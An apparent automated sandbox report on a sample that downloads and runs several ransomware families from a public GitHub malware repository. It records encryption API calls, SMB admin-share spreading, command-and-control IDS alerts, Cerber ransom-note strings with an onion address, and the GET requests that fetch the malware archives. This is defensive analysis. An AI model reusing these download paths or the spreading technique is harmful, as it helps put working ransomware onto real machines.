      Source: 55.0.Endermanch@Birele.exe.400000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
      Source: 49.0.Endermanch@BadRabbit.exe.1320000.2.unpackAvira: Label: TR/ATRAPS.Gen
      Source: 1.2.Endermanch@BadRabbit.exe.1320000.0.unpackAvira: Label: TR/ATRAPS.Gen
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_007B5A73 GetSystemInfo,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,MapViewOfFile,CryptDuplicateHash,CryptHashData,LocalAlloc,CryptGetHashParam,LocalFree,CryptDestroyHash,UnmapViewOfFile,3_2_007B5A73
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_007B5613 CryptStringToBinaryW,CryptStringToBinaryW,LocalAlloc,LocalAlloc,CryptStringToBinaryW,CryptDecodeObjectEx,CryptDecodeObjectEx,LocalAlloc,CryptDecodeObjectEx,CryptImportPublicKeyInfo,LocalFree,LocalFree,3_2_007B5613
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_007B6299 CreateEventW,CreateThread,WaitForSingleObject,CloseHandle,CryptDestroyHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,CloseHandle,LocalFree,3_2_007B6299
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_007B6085 CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDestroyHash,3_2_007B6085
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_007B554A CryptAcquireContextW,GetLastError,CryptGenRandom,CryptReleaseContext,3_2_007B554A
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_007B5D0A CryptDuplicateKey,CreateFileW,GetFileSizeEx,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,CreateFileMappingW,MapViewOfFile,CryptEncrypt,FlushViewOfFile,UnmapViewOfFile,FindCloseChangeNotification,CloseHandle,CryptDestroyKey,SetEvent,3_2_007B5D0A
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_007B5507 CryptAcquireContextW,CryptAcquireContextW,GetLastError,CryptAcquireContextW,3_2_007B5507
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_007B5BC4 GetSystemInfo,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,MapViewOfFile,CryptDuplicateHash,CryptHashData,LocalAlloc,CryptGetHashParam,memcpy,FlushViewOfFile,LocalFree,CryptDestroyHash,UnmapViewOfFile,3_2_007B5BC4
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_007B15A7 GetProcessHeap,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,HeapAlloc,CryptAcquireContextW,GetProcessHeap,HeapAlloc,CryptImportKey,CryptCreateHash,CryptSetHashParam,GetProcessHeap,HeapFree,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,3_2_007B15A7
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_007B6246 CryptCreateHash,CryptHashData,CryptGetHashParam,3_2_007B6246
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_007B56D8 CryptEncrypt,CryptEncrypt,LocalAlloc,memcpy,CryptEncrypt,LocalFree,3_2_007B56D8
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_007B559B CryptSetKeyParam,CryptSetKeyParam,CryptSetKeyParam,CryptGetKeyParam,LocalAlloc,CryptSetKeyParam,LocalFree,3_2_007B559B
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_007B5780 CryptBinaryToStringW,CryptBinaryToStringW,LocalAlloc,CryptBinaryToStringW,LocalFree,3_2_007B5780
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 19_2_0040AD62 CryptAcquireContextW,19_2_0040AD62
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 19_2_0040B17E CryptDecodeObjectEx,CryptImportPublicKeyInfo,LocalFree,19_2_0040B17E
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 19_2_0040B11B CryptAcquireContextW,19_2_0040B11B
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 19_2_0040AD86 CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,19_2_0040AD86
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 19_2_0040AF69 CryptAcquireContextW,19_2_0040AF69
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 19_2_00404B6E CryptAcquireContextW,CryptGenRandom,19_2_00404B6E
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 19_2_004027DD CryptDestroyKey,19_2_004027DD
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 19_2_0040AFFE memcpy,CryptEncrypt,CryptDestroyKey,19_2_0040AFFE
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 19_2_0040AF8D memcpy,CryptImportKey,19_2_0040AF8D
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 19_2_00401000 lstrlen,StrPBrkA,memset,StrSpnA,CryptStringToBinaryA,19_2_00401000
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 19_2_0040B146 CryptGetKeyParam,19_2_0040B146
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 19_2_0040194B SetFilePointerEx,ReadFile,CryptEncrypt,SetFilePointerEx,WriteFile,Sleep,CryptDestroyKey,19_2_0040194B
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 19_2_004011E3 CryptBinaryToStringA,19_2_004011E3
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 19_2_004011B0 CryptBinaryToStringA,19_2_004011B0
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 19_2_0040B253 CryptImportKey,19_2_0040B253
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 19_2_004026FE CryptDestroyKey,19_2_004026FE
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 19_2_0040B283 memcpy,CryptEncrypt,memcpy,CryptEncrypt,19_2_0040B283
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 40_2_0040AD62 CryptAcquireContextW,40_2_0040AD62
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 40_2_0040AD86 CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,40_2_0040AD86
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 40_2_00401000 lstrlen,StrPBrkA,memset,StrSpnA,CryptStringToBinaryA,40_2_00401000
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 40_2_0040B146 CryptGetKeyParam,40_2_0040B146
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 40_2_0040194B SetFilePointerEx,ReadFile,CryptEncrypt,SetFilePointerEx,WriteFile,Sleep,CryptDestroyKey,40_2_0040194B
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 40_2_0040B17E CryptDecodeObjectEx,CryptImportPublicKeyInfo,LocalFree,40_2_0040B17E
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 40_2_0040B11B CryptAcquireContextW,40_2_0040B11B
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 40_2_004011E3 CryptBinaryToStringA,40_2_004011E3
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 40_2_004011B0 CryptBinaryToStringA,40_2_004011B0
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 40_2_0040B253 CryptImportKey,40_2_0040B253
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 40_2_004026FE CryptDestroyKey,40_2_004026FE
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 40_2_0040B283 memcpy,CryptEncrypt,memcpy,CryptEncrypt,40_2_0040B283
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 40_2_0040AF69 CryptAcquireContextW,40_2_0040AF69
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 40_2_00404B6E CryptAcquireContextW,CryptGenRandom,40_2_00404B6E
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 40_2_004027DD CryptDestroyKey,40_2_004027DD
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 40_2_0040AFFE memcpy,CryptEncrypt,CryptDestroyKey,40_2_0040AFFE
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 40_2_0040AF8D memcpy,CryptImportKey,40_2_0040AF8D

      Exploits

      Source: global trafficTCP traffic: 192.168.2.0:139
      Source: global trafficTCP traffic: 192.168.2.2:139
      Source: global trafficTCP traffic: 192.168.2.1:445

      Compliance

      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeUnpacked PE file: 19.2.Endermanch@Cerber5.exe.400000.0.unpack
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeUnpacked PE file: 40.2.Endermanch@Cerber5.exe.400000.0.unpack
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeUnpacked PE file: 58.2.Endermanch@Cerber5.exe.400000.0.unpack
      Source: irH9zMhZub.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.6:49718 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.6:49719 version: TLS 1.2
      Source: irH9zMhZub.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: F:\Windows.old\Users\ArizonaCode\Documents\Visual Studio 2013\Projects\UI\UI\obj\Debug\UI.pdb source: Endermanch@InfinityCrypt.exe.0.dr
      Source: Binary string: F:\DESKTOP!\ChkDsk\ChkDsk\obj\Debug\PremiereCrack.pdb source: Endermanch@InfinityCrypt.exe.0.dr
      Source: Binary string: C:\Windows.old\Users\ArizonaCode\Documents\Visual Studio 2013\Projects\LOGON\LOGON\obj\Debug\LOGON.pdb source: Endermanch@DeriaLock.exe, 0000002C.00000000.315487934.0000000000DD2000.00000002.00000001.01000000.0000000D.sdmp, Endermanch@DeriaLock.exe.0.dr
      Source: Binary string: dcrypt.pdb source: rundll32.exe, 00000003.00000003.306545388.00000000004C2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.300766034.00000000004C2000.00000004.00000020.00020000.00000000.sdmp, cscc.dat.3.dr

      Spreading

      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_007B9534 wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFindExtensionW,wsprintfW,GetLastError,WNetAddConnection2W,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,OpenSCManagerW,memset,GetSystemTimeAsFileTime,wsprintfW,CreateServiceW,StartServiceW,GetLastError,QueryServiceStatus,Sleep,DeleteService,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,DeleteFileW,WNetCancelConnection2W,SetLastError, \\%s\admin$3_2_007B9534
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_007B9B63 wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFindExtensionW,wsprintfW,WNetAddConnection2W,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,GetCurrentThread,OpenThreadToken,DuplicateTokenEx,memset,GetSystemDirectoryW,CloseHandle,PathAppendW,PathFileExistsW,wsprintfW,CreateProcessAsUserW,CreateProcessW,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,PathFileExistsW,GetLastError,GetLastError,DeleteFileW,CloseHandle,CloseHandle,WNetCancelConnection2W,SetLastError, \\%s\admin$3_2_007B9B63
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeFile opened: z:
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeFile opened: x:
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeFile opened: v:
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeFile opened: t:
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeFile opened: r:
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeFile opened: p:
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeFile opened: n:
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeFile opened: l:
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeFile opened: j:
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeFile opened: h:
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeFile opened: f:
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeFile opened: b:
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeFile opened: y:
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeFile opened: w:
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeFile opened: u:
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeFile opened: s:
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeFile opened: q:
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeFile opened: o:
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeFile opened: m:
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeFile opened: k:
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeFile opened: i:
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeFile opened: g:
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeFile opened: e:
      Source: C:\Windows\SysWOW64\fsutil.exeFile opened: c:
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeFile opened: a:
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_007B5E9F PathCombineW,FindFirstFileW,WaitForMultipleObjects,PathCombineW,StrStrIW,PathFindExtensionW,FindNextFileW,FindClose,3_2_007B5E9F
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 19_2_00409857 CoInitialize,GetSystemDirectoryW,SHGetFileInfoW,lstrlenW,SHGetFileInfoW,lstrlenW,SHGetFolderPathW,FindFirstFileW,lstrlenW,CharLowerBuffW,FindNextFileW,FindClose,19_2_00409857
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 19_2_0040A419 wsprintfW,GetFileAttributesW,GetFileSecurityW,GetSecurityDescriptorOwner,EqualSid,GetFileAttributesW,SetFileAttributesW,lstrcatW,GetFileAttributesW,SetFileAttributesW,FindFirstFileW,WaitForSingleObject,lstrlenW,lstrlenW,CharLowerBuffW,Sleep,StrChrW,FindNextFileW,FindClose,19_2_0040A419
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 19_2_00401423 lstrlenW,FindFirstFileW,PathMatchSpecW,FindNextFileW,19_2_00401423
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 40_2_00409857 CoInitialize,GetSystemDirectoryW,SHGetFileInfoW,lstrlenW,SHGetFileInfoW,lstrlenW,SHGetFolderPathW,FindFirstFileW,lstrlenW,CharLowerBuffW,FindNextFileW,FindClose,40_2_00409857
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 40_2_0040A419 wsprintfW,GetFileAttributesW,GetFileSecurityW,GetSecurityDescriptorOwner,EqualSid,GetFileAttributesW,SetFileAttributesW,lstrcatW,GetFileAttributesW,SetFileAttributesW,FindFirstFileW,WaitForSingleObject,lstrlenW,lstrlenW,CharLowerBuffW,Sleep,StrChrW,FindNextFileW,FindClose,40_2_0040A419
      Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exeCode function: 40_2_00401423 lstrlenW,FindFirstFileW,PathMatchSpecW,FindNextFileW,40_2_00401423

      Networking

      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.0 139
      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 23.50.106.206 445
      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.2 139
      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.1 445
      Source: TrafficSnort IDS: 2023613 ET TROJAN Ransomware/Cerber Checkin M3 (2) 192.168.2.6:59083 -> 93.107.12.0:6893
      Source: TrafficSnort IDS: 2824087 ETPRO TROJAN MSIL/DeriaLock Ransomware CnC Activity 192.168.2.6:49767 -> 162.55.0.137:80
      Source: Endermanch@Cerber5.exe, 00000013.00000002.477824188.00000000063D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://{TOR}.onion/{PC_ID}
      Source: Endermanch@Cerber5.exe, 00000013.00000002.517214443.00000000063F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>type or copy the add<span class="h">LU</span>ress <br><span class="info">http://xpcx6erilkjced3j.onion/12F2-EF4B-B826-0098-BE1F</span><br> in this browser address bar;</li>
      Source: Endermanch@Cerber5.exe, 00000013.00000002.517214443.00000000063F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <br><span class="info">http://xpcx6erilkjced3j.onion/12F2-EF4B-B826-0098-BE1F</span><br>
      Source: Endermanch@Cerber5.exe, 00000013.00000002.517214443.00000000063F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <br><span class="info">http://xpcx6erilkjced3j.onion/12F2-EF4B-B826-0098-BE1F</span><br></li>
      Source: Endermanch@Cerber5.exe, 00000013.00000002.517214443.00000000063F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>typ of kopieer het a<span class="h">fEIb6Ps</span>dres <br><span class="info">http://xpcx6erilkjced3j.onion/12F2-EF4B-B826-0098-BE1F</span><br> in de adresbalk van uw browser;</li>
      Source: Endermanch@Cerber5.exe, 00000013.00000002.517214443.00000000063F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: adresse <br><span class="info">http://xpcx6erilkjced3j.onion/12F2-EF4B-B826-0098-BE1F</span><br> dans cette barre d
      Source: Endermanch@Cerber5.exe, 00000013.00000002.517214443.00000000063F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>tippen oder kopieren Sie die Adresse <br><span class="info">http://xpcx6erilkjced3j.onion/12F2-EF4B-B826-0098-BE1F</span><br> in diese Browser-Adressleiste;</li>
      Source: Endermanch@Cerber5.exe, 00000013.00000002.517214443.00000000063F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>digitare o copiare l'indirizzo <br><span class="info">http://xpcx6erilkjced3j.onion/12F2-EF4B-B826-0098-BE1F</span><br> nella barra degli indirizzi di questo browser;</li>
      Source: Endermanch@Cerber5.exe, 00000013.00000002.517214443.00000000063F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>wpisz lub skopiuj adres <br><span class="info">http://xpcx6erilkjced3j.onion/12F2-EF4B-B826-0098-BE1F</span><br> do paska adresu przegl
      Source: Endermanch@Cerber5.exe, 00000013.00000002.517214443.00000000063F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: o <br><span class="info">http://xpcx6erilkjced3j.onion/12F2-EF4B-B826-0098-BE1F</span><br> nesta barra de endere
      Source: Endermanch@Cerber5.exe, 00000013.00000002.517214443.00000000063F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: n <br><span class="info">http://xpcx6erilkjced3j.onion/12F2-EF4B-B826-0098-BE1F</span><br> en la barra de direcciones de este navegador;</li>
      Source: Endermanch@Cerber5.exe, 00000013.00000002.517214443.00000000063F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: n adres <br><span class="info">http://xpcx6erilkjced3j.onion/12F2-EF4B-B826-0098-BE1F</span><br>
      Source: Endermanch@Cerber5.exe, 00000013.00000003.307919338.00000000063C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://{TOR}.onion/{PC_ID}
      Source: Endermanch@Cerber5.exe, 00000013.00000003.353550421.00000000063DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: how to decrypt your files. \n\n If you cannot find any (*_R_E_A_D___T_H_I_S_*) file at your PC, \n follow the instructions below: \n\n 1. Download \"Tor Browser\" from https://www.torproject.org/ and install it. \n 2. In the \"Tor Browser\" open your personal page here: \n\n http://{TOR}.onion/{PC_ID} \n\n Note! This page is available via \"Tor Browser\" only. \n\n\n"},"whitelist":{"folders":["\\bitcoin\\","\\excel\\","\\microsoft sql server\\","\\microsoft\\excel\\","\\microsoft\\microsoft sql server\\","\\microsoft\\office\\","\\microsoft\\onenote\\","\\microsoft\\outlook\\","\\microsoft\\powerpoint\\","\\microsoft\\word\\","\\office\\","\\onenote\\","\\outlook\\","\\powerpoint\\","\\steam\\","\\the bat!\\","\\thunderbird\\","\\word\\"]}}
      Source: Endermanch@Cerber5.exe, 00000013.00000003.353550421.00000000063DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://{TOR}.onion/{PC_ID}
      Source: Endermanch@Cerber5.exe, 00000013.00000002.472553764.00000000063C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xpcx6erilkjced3j.onion/12F2-EF4B-B826-0098-BE1F
      Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>type or copy the add<span class="h">{RAND}</span>ress <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br> in this browser address bar;</li>
      Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br>
      Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br></li>
      Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>typ of kopieer het a<span class="h">{RAND}</span>dres <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br> in de adresbalk van uw browser;</li>
      Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: adresse <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br> dans cette barre d
      Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>tippen oder kopieren Sie die Adresse <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br> in diese Browser-Adressleiste;</li>
      Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>digitare o copiare l'indirizzo <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br> nella barra degli indirizzi di questo browser;</li>
      Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>wpisz lub skopiuj adres <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br> do paska adresu przegl
      Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: o <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br> nesta barra de endere
      Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: n <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br> en la barra de direcciones de este navegador;</li>
      Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: n adres <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br>
      Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>type or copy the add<span class="h">LU</span>ress <br><span class="info">http://xpcx6erilkjced3j.onion/12F2-EF4B-B826-0098-BE1F</span><br> in this browser address bar;</li>
      Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <br><span class="info">http://xpcx6erilkjced3j.onion/12F2-EF4B-B826-0098-BE1F</span><br>
      Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <br><span class="info">http://xpcx6erilkjced3j.onion/12F2-EF4B-B826-0098-BE1F</span><br></li>
      Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>typ of kopieer het a<span class="h">fEIb6Ps</span>dres <br><span class="info">http://xpcx6erilkjced3j.onion/12F2-EF4B-B826-0098-BE1F</span><br> in de adresbalk van uw browser;</li>
      Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: adresse <br><span class="info">http://xpcx6erilkjced3j.onion/12F2-EF4B-B826-0098-BE1F</span><br> dans cette barre d
      Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>tippen oder kopieren Sie die Adresse <br><span class="info">http://xpcx6erilkjced3j.onion/12F2-EF4B-B826-0098-BE1F</span><br> in diese Browser-Adressleiste;</li>
      Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>digitare o copiare l'indirizzo <br><span class="info">http://xpcx6erilkjced3j.onion/12F2-EF4B-B826-0098-BE1F</span><br> nella barra degli indirizzi di questo browser;</li>
      Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>wpisz lub skopiuj adres <br><span class="info">http://xpcx6erilkjced3j.onion/12F2-EF4B-B826-0098-BE1F</span><br> do paska adresu przegl
      Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: o <br><span class="info">http://xpcx6erilkjced3j.onion/12F2-EF4B-B826-0098-BE1F</span><br> nesta barra de endere
      Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: n <br><span class="info">http://xpcx6erilkjced3j.onion/12F2-EF4B-B826-0098-BE1F</span><br> en la barra de direcciones de este navegador;</li>
      Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: n adres <br><span class="info">http://xpcx6erilkjced3j.onion/12F2-EF4B-B826-0098-BE1F</span><br>
      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
      Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/BadRabbit.zip HTTP/1.1Host: github.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/BadRabbit.zip HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Birele.zip HTTP/1.1Host: github.com
      Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Birele.zip HTTP/1.1Host: raw.githubusercontent.com
      Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Cerber%205.zip HTTP/1.1Host: github.com
      Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Cerber%205.zip HTTP/1.1Host: raw.githubusercontent.com
      Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/DeriaLock.zip HTTP/1.1Host: github.com
      Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/DeriaLock.zip HTTP/1.1Host: raw.githubusercontent.com
      Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Fantom.zip HTTP/1.1Host: github.com
      Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Fantom.zip HTTP/1.1Host: raw.githubusercontent.com
      Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/InfinityCrypt.zip HTTP/1.1Host: github.com
      Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/InfinityCrypt.zip HTTP/1.1Host: raw.githubusercontent.com
